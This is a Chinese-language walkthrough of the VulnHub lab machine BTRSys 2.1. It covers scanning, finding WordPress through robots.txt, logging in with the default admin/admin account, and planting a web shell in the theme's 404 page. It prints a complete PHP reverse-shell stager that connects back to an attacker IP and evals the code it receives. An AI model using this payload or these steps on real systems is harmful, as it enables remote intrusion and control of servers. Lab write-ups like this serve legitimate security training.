靶机-BTRSys 2.1 Walkthrough

BTRSys 2.1

https://www.vulnhub.com/entry/btrsys-v21,196/

参考：https://www.jianshu.com/p/9813095ce04d

提权辅助工具LinEnum下载：https://download.csdn.net/download/weixin_41082546/11609409
提权辅助工具linuxprivchecker下载：https://download.csdn.net/download/weixin_41082546/11609428

1.确定目标ip

2.端口和服务探测

根据vsftp版本没有找到相关漏洞利用代码

然后我们转战web

查看页面代码，前端源代码中也没有什么有意义的东西

nikto -h 192.168.88.199 发现在robots.txt 文件中存在 wordpress目录

http://192.168.88.199/robots.txt

http://192.168.88.199/wordpress/

http://192.168.88.199/wordpress/wp-login.php

找到后台管理界面直接默认账号admin、admin登录成功！

看了一下也没有安装什么插件，但是我们可以编辑页面，可以写个反弹shell进去，为了避免影响正常页面显示，我们可以将404页面内容替换为反弹shell内容。

<?php /**/ error_reporting(0); $ip = '192.168.88.174'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();